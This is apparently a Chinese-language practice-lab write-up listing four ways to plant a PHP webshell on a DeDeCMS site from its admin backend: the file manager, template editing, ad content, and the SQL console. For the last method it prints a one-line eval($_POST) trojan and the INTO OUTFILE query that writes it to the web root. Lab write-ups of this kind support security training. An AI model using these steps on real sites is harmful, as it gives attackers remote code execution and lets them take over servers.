DeDeCMS靶场攻略
搭建环境
一、姿势一 通过文件管理器上传webshell
点击核心,文件式管理器,文件上传
上传文件1.php,里面是一句话木马
上传
上传后去访问一下
访问成功,测试连接
二、姿势二 修改模板文件拿到webshell
点击模板,默认模版管理
下滑找到index.html,点击修改
在文件里添加一句话木马,保存
点击生成,更新主页html
把主页位置修改为../index.php,点击生成静态,更新主页html
访问index.php
测试连接
三、姿势三 后台任意命令执行,拿到webshell
点击模块,广告管理
点击添加一个新广告
在广告内容添加一句话代码
点击确定后,点击代码
找到路径,与站点进行拼接
访问拼接后的网站,访问成功
测试连接
四、姿势四 通过后台sql命令执行拿到webshell
点击系统,sql命令行工具
执行命令select @@basedir,点击确定
出现了MySQL的绝对路径
再用into outfile写入一句话木马,点击确定
select '<?php @eval($_POST[cmd]);?>' into outfile 'F:/phpstudy_pro/WWW/wjf123.php'
访问wjf123.php
访问成功,测试连接
